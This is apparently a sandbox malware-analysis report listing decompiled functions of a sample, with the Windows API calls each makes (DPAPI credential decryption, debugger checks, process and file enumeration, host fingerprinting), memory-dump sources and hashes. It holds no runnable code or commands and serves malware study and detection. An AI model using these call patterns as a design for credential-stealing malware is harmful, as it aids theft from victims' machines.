                                                                                  • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00B0CAE3
                                                                                  • memcpy.MSVCRT(?,?,?), ref: 00B0CB79
                                                                                  • lstrcat.KERNEL32(?,00420B46), ref: 00B0CBAA
                                                                                  • lstrcat.KERNEL32(?,00420B47), ref: 00B0CBBE
                                                                                  • lstrcat.KERNEL32(?,00420B4E), ref: 00B0CBDF
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
                                                                                  • String ID:
                                                                                  • API String ID: 1498829745-0
                                                                                  • Opcode ID: 8afa8c5297eb8f4e39a0d79a998b97b224f9fa32b0e1124346c3568978b0ec32
                                                                                  • Instruction ID: f6585ddfe43c28543fffb4bbaec917ca5a2458f1f73ede1d87c764a7b5107ebb
                                                                                  • Opcode Fuzzy Hash: 8afa8c5297eb8f4e39a0d79a998b97b224f9fa32b0e1124346c3568978b0ec32
                                                                                  • Instruction Fuzzy Hash: 56415F7894421EEFDB10DFD0DD89BEEBBB8FB44304F1045A8E609A6280D7745A84CF91
                                                                                  Function 00409AC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55encryptionmemoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
                                                                                  • LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
                                                                                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
                                                                                  • LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: BinaryCryptLocalString$AllocFree
                                                                                  • String ID: N@
                                                                                  • API String ID: 4291131564-4229412743
                                                                                  • Opcode ID: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                                                                                  • Instruction ID: b446a55777cc1d1e4698a5b325ac1ac72e8f4b69ff9cac50ab15cfe2fa8c9284
                                                                                  • Opcode Fuzzy Hash: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                                                                                  • Instruction Fuzzy Hash: 4811A4B4240208BFEB10CFA4DC95FAA77B5FB89714F208059FA159B3D0C776A901CB54
                                                                                  Function 00B17DF7 Relevance: 7.6, APIs: 5, Instructions: 114memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00B1A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B1A9EF
                                                                                  • GetKeyboardLayoutList.USER32(00000000,00000000,004205AF), ref: 00B17E48
                                                                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00B17E60
                                                                                  • GetKeyboardLayoutList.USER32(?,00000000), ref: 00B17E74
                                                                                  • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00B17EC9
                                                                                  • LocalFree.KERNEL32(00000000), ref: 00B17F89
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                                                                  • String ID:
                                                                                  • API String ID: 3090951853-0
                                                                                  • Opcode ID: 7596f6bab02a8893db2d538185692abed2554d8effdd32d34ab9a344058ae76c
                                                                                  • Instruction ID: 148b1c726649969429fdfc8296d7d0a4d3d898fba3f62585704769e11de51e0b
                                                                                  • Opcode Fuzzy Hash: 7596f6bab02a8893db2d538185692abed2554d8effdd32d34ab9a344058ae76c
                                                                                  • Instruction Fuzzy Hash: B4413871951218ABCB24DB94DC89BEEB7B8FB44700F6041D9E00AA2191DB342FC5CFA1
                                                                                  Function 0041B33A Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • IsDebuggerPresent.KERNEL32 ref: 0041BBA2
                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0041BBB7
                                                                                  • UnhandledExceptionFilter.KERNEL32(0041F2A8), ref: 0041BBC2
                                                                                  • GetCurrentProcess.KERNEL32(C0000409), ref: 0041BBDE
                                                                                  • TerminateProcess.KERNEL32(00000000), ref: 0041BBE5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                  • String ID:
                                                                                  • API String ID: 2579439406-0
                                                                                  • Opcode ID: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                                                                  • Instruction ID: 2759986af63cf1bc905e0f8428f5e2b998159022a12c47e0d709fe691c65c3be
                                                                                  • Opcode Fuzzy Hash: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                                                                  • Instruction Fuzzy Hash: E921A3BC9002059FDB10DF69FD89A963BE4FB0A314F50403AE90A87264DBB45981EF4D
                                                                                  Function 00B1B5A1 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • IsDebuggerPresent.KERNEL32 ref: 00B1BE09
                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00B1BE1E
                                                                                  • UnhandledExceptionFilter.KERNEL32(0041F2A8), ref: 00B1BE29
                                                                                  • GetCurrentProcess.KERNEL32(C0000409), ref: 00B1BE45
                                                                                  • TerminateProcess.KERNEL32(00000000), ref: 00B1BE4C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                  • String ID:
                                                                                  • API String ID: 2579439406-0
                                                                                  • Opcode ID: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                                                                  • Instruction ID: 8e48c42ad0c0d9f18b2bc52178ca3c19e8ba6d70f618b740240eae73afacb578
                                                                                  • Opcode Fuzzy Hash: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                                                                  • Instruction Fuzzy Hash: E421A3BC9002059FDB14DF69F889A963BF4FB0A314F50447AE90987265EBB05981EF49
                                                                                  Function 00407240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetProcessHeap.KERNEL32(00000008,00000400,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90), ref: 0040724D
                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407254
                                                                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00407281
                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000,?,?,?,?,?,00407C90,80000001,004161C4), ref: 004072A4
                                                                                  • LocalFree.KERNEL32(?,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 004072AE
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Heap$AllocByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                                                                  • String ID:
                                                                                  • API String ID: 3657800372-0
                                                                                  • Opcode ID: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                                                                  • Instruction ID: ec186dc502c88c98e3638293fff085d95328f9e4ca1f8ca95b137b7d6c986ae9
                                                                                  • Opcode Fuzzy Hash: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                                                                  • Instruction Fuzzy Hash: 900100B5A80208BBEB10DFD4DD45F9E77B9EB44704F104159FB05BA2C0D674AA018B66
                                                                                  Function 00B074A7 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00B074B4
                                                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00B074BB
                                                                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00B074E8
                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00B0750B
                                                                                  • LocalFree.KERNEL32(?), ref: 00B07515
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                                                                  • String ID:
                                                                                  • API String ID: 2609814428-0
                                                                                  • Opcode ID: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                                                                  • Instruction ID: 6221579ed3f09a54ec221126d739e51f4bb317734c51ffa3031d7b137c665453
                                                                                  • Opcode Fuzzy Hash: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                                                                  • Instruction Fuzzy Hash: 8D010075A80208BBEB10DFD4DD45F9D77B9EB45704F104155F705AA2C0DA70AA018B65
                                                                                  Function 00419600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0041961E
                                                                                  • Process32First.KERNEL32(00420ACA,00000128), ref: 00419632
                                                                                  • Process32Next.KERNEL32(00420ACA,00000128), ref: 00419647
                                                                                  • StrCmpCA.SHLWAPI(?,00000000), ref: 0041965C
                                                                                  • CloseHandle.KERNEL32(00420ACA), ref: 0041967A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                  • String ID:
                                                                                  • API String ID: 420147892-0
                                                                                  • Opcode ID: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                                                                                  • Instruction ID: 11d567adce4b572477f284a2ec541547db87c4b6fd8ba8cb36d7f0fd64301d48
                                                                                  • Opcode Fuzzy Hash: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                                                                                  • Instruction Fuzzy Hash: F201E9B9A40208ABCB24DFA5C958BEEB7F9EB49700F104189E90996250D7389F81CF61
                                                                                  Function 00B19867 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00B19885
                                                                                  • Process32First.KERNEL32(00420ACA,00000128), ref: 00B19899
                                                                                  • Process32Next.KERNEL32(00420ACA,00000128), ref: 00B198AE
                                                                                  • StrCmpCA.SHLWAPI(?,00000000), ref: 00B198C3
                                                                                  • CloseHandle.KERNEL32(00420ACA), ref: 00B198E1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                  • String ID:
                                                                                  • API String ID: 420147892-0
                                                                                  • Opcode ID: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                                                                                  • Instruction ID: f368e4e38eef127faf7fb44b25c18d94de5b49ea479ae73d28985b45ccef5c56
                                                                                  • Opcode Fuzzy Hash: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                                                                                  • Instruction Fuzzy Hash: B7012979A40208FBCB20DFA4C894BEDB7F9EB09740F004189A505A6240D7749A80CF51
                                                                                  Function 00B0E697 Relevance: 6.5, APIs: 4, Instructions: 514fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00B1A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B1A9EF
                                                                                    • Part of subcall function 00B1AB87: lstrcpy.KERNEL32(00000000,?), ref: 00B1ABD9
                                                                                    • Part of subcall function 00B1AB87: lstrcat.KERNEL32(00000000), ref: 00B1ABE9
                                                                                    • Part of subcall function 00B1AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B1AC2C
                                                                                    • Part of subcall function 00B1AC17: lstrcpy.KERNEL32(00000000), ref: 00B1AC6B
                                                                                    • Part of subcall function 00B1AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B1AC79
                                                                                    • Part of subcall function 00B1AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B1AB6C
                                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004214F0,00420D73), ref: 00B0E709
                                                                                  • StrCmpCA.SHLWAPI(?,004214F8), ref: 00B0E759
                                                                                  • StrCmpCA.SHLWAPI(?,004214FC), ref: 00B0E76F
                                                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00B0EE46
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                                                                  • String ID:
                                                                                  • API String ID: 433455689-0
                                                                                  • Opcode ID: f3dcec5693a34f3f639a4326c9ab4e832b2dce632252e8eb0e6dc656e0f1fa1e
                                                                                  • Instruction ID: 44066117c1e4da54f60b63f46a0c5f7ad3263372fdc454174fa9dbc612b3b458
                                                                                  • Opcode Fuzzy Hash: f3dcec5693a34f3f639a4326c9ab4e832b2dce632252e8eb0e6dc656e0f1fa1e
                                                                                  • Instruction Fuzzy Hash: 9712ED71A112189BCB18FB60DD96EED77B9AF54700F8045EDB50A62091EE346FC8CF92
                                                                                  Function 00418EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CryptBinaryToStringA.CRYPT32(00000000,00405184,40000001,00000000,00000000,?,00405184), ref: 00418EC0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: BinaryCryptString
                                                                                  • String ID:
                                                                                  • API String ID: 80407269-0
                                                                                  • Opcode ID: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                                                                  • Instruction ID: 3c4cb89ba01459054e3b3595e947631781f59a96386c3a2a773972b879479806
                                                                                  • Opcode Fuzzy Hash: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                                                                  • Instruction Fuzzy Hash: 62111C74200204BFDB00CFA4D884FA733AAAF89304F109549F9198B250DB39EC82DB65
                                                                                  Function 00B19107 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CryptBinaryToStringA.CRYPT32(00000000,00B053EB,40000001,00000000,00000000,?,00B053EB), ref: 00B19127
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: BinaryCryptString
                                                                                  • String ID:
                                                                                  • API String ID: 80407269-0
                                                                                  • Opcode ID: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                                                                  • Instruction ID: 5442f52c6bc664851ad4294be274c14147e88e4776a4c7ee3c2fc125775f4202
                                                                                  • Opcode Fuzzy Hash: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                                                                  • Instruction Fuzzy Hash: AD113A74204245BFDB00CF94D898FA733EAEF8A740F509598F9098B254C771E8D2DB60
                                                                                  Function 00B09D27 Relevance: 6.1, APIs: 4, Instructions: 55encryptionmemoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00B05155,00000000,00000000), ref: 00B09D56
                                                                                  • LocalAlloc.KERNEL32(00000040,?,?,?,00B05155,00000000,?), ref: 00B09D68
                                                                                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00B05155,00000000,00000000), ref: 00B09D91
                                                                                  • LocalFree.KERNEL32(?,?,?,?,00B05155,00000000,?), ref: 00B09DA6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: BinaryCryptLocalString$AllocFree
                                                                                  • String ID:
                                                                                  • API String ID: 4291131564-0
                                                                                  • Opcode ID: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                                                                                  • Instruction ID: 6a31b7674025dcbaddbbc35abfd327d460f778edfa8e82fd9b1e99cc97f55c67
                                                                                  • Opcode Fuzzy Hash: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                                                                                  • Instruction Fuzzy Hash: 2E1162B4641208EFEB10CFA4C895BAA77A5EB89714F208158FD159B394C676A941CB90
                                                                                  Function 00409B60 Relevance: 6.0, APIs: 4, Instructions: 50memoryencryptionCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409B84
                                                                                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 00409BA3
                                                                                  • memcpy.MSVCRT(?,?,?), ref: 00409BC6
                                                                                  • LocalFree.KERNEL32(?), ref: 00409BD3
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Local$AllocCryptDataFreeUnprotectmemcpy
                                                                                  • String ID:
                                                                                  • API String ID: 3243516280-0
                                                                                  • Opcode ID: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                                                                                  • Instruction ID: 8471c3d920f6d21a6ca128c50317bdd839bed9d1cf50ed0ddd6ab59e3c77a746
                                                                                  • Opcode Fuzzy Hash: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                                                                                  • Instruction Fuzzy Hash: 46110CB8A00209EFDB04DF94D985AAE77B6FF89300F104569F915A7390D774AE10CF61
                                                                                  Function 00B09DC7 Relevance: 6.0, APIs: 4, Instructions: 50memoryencryptionCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00B09DEB
                                                                                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 00B09E0A
                                                                                  • memcpy.MSVCRT(?,?,?), ref: 00B09E2D
                                                                                  • LocalFree.KERNEL32(?), ref: 00B09E3A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Local$AllocCryptDataFreeUnprotectmemcpy
                                                                                  • String ID:
                                                                                  • API String ID: 3243516280-0
                                                                                  • Opcode ID: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                                                                                  • Instruction ID: 3e6183e62467ac28c6c9c6c7202be2e3e98fbc7de55b32e9cbc4556deb278052
                                                                                  • Opcode Fuzzy Hash: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                                                                                  • Instruction Fuzzy Hash: 3D11FAB8A00209EFDB04CFA4D989AAE77F5FF89300F108558E91597390D730AE10CF61
                                                                                  Function 00417A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,00909EF0,00000000,?,00420E10,00000000,?,00000000,00000000), ref: 00417A63
                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,00000000,00000000,?,00909EF0,00000000,?,00420E10,00000000,?,00000000,00000000,?), ref: 00417A6A
                                                                                  • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,00909EF0,00000000,?,00420E10,00000000,?,00000000,00000000,?), ref: 00417A7D
                                                                                  • wsprintfA.USER32 ref: 00417AB7
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                                                                                  • String ID:
                                                                                  • API String ID: 362916592-0
                                                                                  • Opcode ID: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                                                                                  • Instruction ID: 8af700d3b0e32b47e9d6ddd9198ddf9a5cfc8e3ba9127fd648bfb7377b14e362
                                                                                  • Opcode Fuzzy Hash: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                                                                                  • Instruction Fuzzy Hash: 461152B1A45228EFEB108B54DC45F9AB7B8FB05711F10439AE516932C0D7785A40CF55
                                                                                  Function 00413720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CoCreateInstance.COMBASE(0041E118,00000000,00000001,0041E108,00000000), ref: 00413758
                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 004137B0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
